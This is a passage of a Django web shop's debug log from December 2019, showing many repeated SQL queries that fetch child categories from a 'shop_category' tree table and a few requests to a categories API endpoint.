"shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:56:24,480 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:56:24,482 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:56:24,484 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:56:24,486 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:56:24,488 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:56:24,491 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:56:24,493 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:56:24,495 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:56:24,498 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:56:24,500 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:56:24,502 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:56:24,506 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:56:24,508 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:56:24,511 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:56:24,513 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:56:24,518 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:56:24,520 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:56:24,524 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:56:24,526 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:56:24,529 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:56:24,531 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:56:24,534 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:56:24,538 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:56:24,541 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:56:24,543 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:56:24,547 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:56:24,549 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:56:24,551 utils 4252 140031732287232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:56:24,554 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:56:24,557 utils 4252 140031732287232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-20 06:56:24,557 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:56:24,565 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:56:24,569 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:56:24,576 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) [20/Dec/2019 06:56:24] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:56:24,580 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:56:24,585 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:56:24,588 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:56:24,591 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:56:24,595 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:56:24,600 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:56:24,603 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:56:24,607 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:56:24,611 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:56:24,614 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:56:24,620 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:56:24,624 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:56:24,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:56:24,631 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:56:24,634 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:56:24,638 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:56:24,642 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:56:24,645 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:56:24,649 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:56:24,653 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:56:24,656 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:56:24] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 06:57:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 06:59:47,847 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:59:47,858 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:59:47,865 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:59:47,870 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:59:47,876 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:59:47,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:59:47,884 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:59:47,888 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:59:47,893 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:59:47,899 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:59:47,903 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:59:47,907 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY 